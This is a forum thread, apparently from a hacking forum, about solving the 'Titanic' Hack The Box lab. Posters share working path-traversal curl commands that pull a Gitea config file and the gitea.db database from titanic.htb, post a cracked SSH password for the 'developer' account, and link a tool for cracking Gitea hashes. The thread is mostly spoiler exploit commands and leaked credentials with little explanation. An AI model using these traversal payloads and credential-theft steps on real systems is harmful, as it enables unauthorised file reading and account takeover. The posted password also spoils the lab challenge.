Posts: 33
Threads: 1
Joined: Oct 2024
Feb 15, 2025, 07:41 PM
(This post was last modified: Feb 15, 2025, 07:42 PM by kyakeiuwu.)
curl 'http://titanic.htb/download?ticket=../../../../../home/developer/gitea/data/gitea/conf/app.ini'
this is big!
(Feb 15, 2025, 07:39 PM)Phoka Wrote: curl "http://titanic.htb/download?ticket=../../../../../../../../../../home/developer/gitea/data/gitea/gitea.db" --output gitea.db
do you know how to crack gitea hashes?
Posts: 216
Threads: 42
Joined: Nov 2024
ssh creds for developer
developer : 25282528
Posts: 9
Threads: 0
Joined: Feb 2025
(Feb 15, 2025, 07:41 PM)Saidakbarxon Wrote: (Feb 15, 2025, 07:39 PM)Phoka Wrote: curl "http://titanic.htb/download?ticket=../../../../../../../../../../home/developer/gitea/data/gitea/gitea.db" --output gitea.db
When there is nothing
there is a file
Posts: 33
Threads: 1
Joined: Oct 2024
Got `curl 'http://titanic.htb/download?ticket=../../../../../home/developer/gitea/data/gitea/conf/app.ini'` this is big!
Posts: 48
Threads: 3
Joined: Jan 2025
(Feb 15, 2025, 07:43 PM)LostGem Wrote: ssh creds for developer
developer : 25282528
how did you get that?
did you use the LFI?
Posts: 6
Threads: 0
Joined: Jan 2025
(Feb 15, 2025, 07:39 PM)Phoka Wrote: curl "http://titanic.htb/download?ticket=../../../../../../../../../../home/developer/gitea/data/gitea/gitea.db" --output gitea.db
How did you find the gitea directory? I know why it's developer, but not why gitea
Posts: 33
Threads: 1
Joined: Oct 2024
Posts: 26
Threads: 0
Joined: Dec 2024
Feb 15, 2025, 07:53 PM
(This post was last modified: Feb 15, 2025, 07:53 PM by Saidakbarxon.)
(Feb 15, 2025, 07:44 PM)smwhck Wrote: (Feb 15, 2025, 07:41 PM)Saidakbarxon Wrote: (Feb 15, 2025, 07:39 PM)Phoka Wrote: curl "http://titanic.htb/download?ticket=../../../../../../../../../../home/developer/gitea/data/gitea/gitea.db" --output gitea.db
When there is nothing
there is a file I don't think you'll find anything useful in the file.
(Feb 15, 2025, 07:44 PM)smwhck Wrote: (Feb 15, 2025, 07:41 PM)Saidakbarxon Wrote: (Feb 15, 2025, 07:39 PM)Phoka Wrote: curl "http://titanic.htb/download?ticket=../../../../../../../../../../home/developer/gitea/data/gitea/gitea.db" --output gitea.db
When there is nothing
there is a file I don't think you'll find anything useful in the file. This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Posts: 33
Threads: 1
Joined: Oct 2024
(Feb 15, 2025, 07:53 PM)Saidakbarxon Wrote: (Feb 15, 2025, 07:44 PM)smwhck Wrote: (Feb 15, 2025, 07:41 PM)Saidakbarxon Wrote: (Feb 15, 2025, 07:39 PM)Phoka Wrote: curl "http://titanic.htb/download?ticket=../../../../../../../../../../home/developer/gitea/data/gitea/gitea.db" --output gitea.db
When there is nothing
there is a file I don't think you'll find anything useful in the file.
(Feb 15, 2025, 07:44 PM)smwhck Wrote: (Feb 15, 2025, 07:41 PM)Saidakbarxon Wrote: (Feb 15, 2025, 07:39 PM)Phoka Wrote: curl "http://titanic.htb/download?ticket=../../../../../../../../../../home/developer/gitea/data/gitea/gitea.db" --output gitea.db
When there is nothing
there is a file I don't think you'll find anything useful in the file.
there's developer password in it!
Posts: 48
Threads: 3
Joined: Jan 2025
(Feb 15, 2025, 07:51 PM)kyakeiuwu Wrote: https://gist.github.com/h4rithd/0c5da36a...71cf14e271
Thank you, that was very helpful
|
